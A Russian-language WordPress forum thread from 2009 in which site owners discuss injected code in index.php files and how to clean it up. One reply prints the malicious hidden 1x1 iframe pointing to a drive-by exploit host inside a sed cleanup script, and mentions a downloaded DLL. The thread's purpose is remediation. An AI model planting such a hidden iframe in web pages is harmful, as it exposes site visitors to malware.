[Помогите] Проблема с WP

Тема в разделе "Wordpress", создана пользователем /Montana, 31 мар 2009.

Статус темы:
Закрыта.
Модераторы: DzSoft, Sorcus
  1. /Montana

    /Montana Постоялец

    Регистр.:
    28 май 2008
    Сообщения:
    119
    Симпатии:
    6
    На хостинге стоит порядка 30-ти сайтов, все на WP, как правило после наполнения содержанием, каждый из них забывается, никакие настройки не меняются.
    Вчера один из блогов работать перестал, выдавал ошибку syntax error ссылаясь на 18-ую строку index.php - в нем появилась следующая запись:
    Код:
    <html><body onload=""></body></html>
    
    Во все остальных сделаных подобно она отсутствует, что это ваще?
     
  2. Compressor

    Compressor

    Регистр.:
    31 янв 2009
    Сообщения:
    314
    Симпатии:
    200
    Это вирус.
    Замените индекс оригинальным.
    Уберите права на запись с папки домена, да и с файлов внутренних уберите. Проверте свой комп.
    Ну и хостеру напишите если не поможет.
     
  3. itex

    itex

    Регистр.:
    15 ноя 2007
    Сообщения:
    274
    Симпатии:
    64
    Странно, что в onload="" пустое место, там должен быть адрес сплоита. Может вручную ставили для проверки, заметите или нет мол, чтоб потом по полной на всех сайтах зафигачить.
     
  4. Compressor

    Compressor

    Регистр.:
    31 янв 2009
    Сообщения:
    314
    Симпатии:
    200
    В таком случае смените пароль на фтп еще.
     
  5. wm-arc

    wm-arc

    Регистр.:
    14 сен 2007
    Сообщения:
    285
    Симпатии:
    280
    в скором времени там будет iframe, у меня так куча сайтов рухнула
    для решения вопроса использовал такой скрипт(для html), все слэши экранируем \
    #!/bin/sh

    find . -name '*.html' -exec grep -l "cocacola" {} \; > cocacola.txt
    while read line
    do
    sed 's/<iframe src="http:\/\/betstarwager.cn\/in.cgi?cocacola86" width=1 height=1 style="visibility: hidden"><\/iframe>//g' $line > tmp
    mv tmp $line
    done < cocacola.txt
    если неправильно записать вид iframe, все файлы потруться в 0
    идеальный вариант если не много index home сделать все вручную
    искать так например
    find . -print0 | xargs -0 grep -l cocacola > cocacola.txt заражает файлы index.* home.*, пароль менял бесполезно, шелов нет
    после лечения поставить chmod 444 на все что было заражено
    wp там правда древний везде был 231-233
     
  6. Mix3r

    Mix3r Создатель

    Регистр.:
    24 мар 2009
    Сообщения:
    22
    Симпатии:
    1
    Я такую же словил на версии WP 2.7.1 - так что от версии, видимо, не зависит. И права на index.php стояли 644
     
  7. /Montana

    /Montana Постоялец

    Регистр.:
    28 май 2008
    Сообщения:
    119
    Симпатии:
    6
    Просто когда ставят iframe 1x1 он не виден на странице и тем более не должен вырубать её))
     
  8. wm-arc

    wm-arc

    Регистр.:
    14 сен 2007
    Сообщения:
    285
    Симпатии:
    280
    именно на wp не вырубает, но если у тебя к примеру 100 копий стоит, сколько будешь искать где проблема, как вариант можно зазендить индексные файлы и по системам мониторинга сразу будет видно что именно в дауне, но проще chmod 444
    ps у меня еще этот iframe подгружал digeste.dll
     
Статус темы:
Закрыта.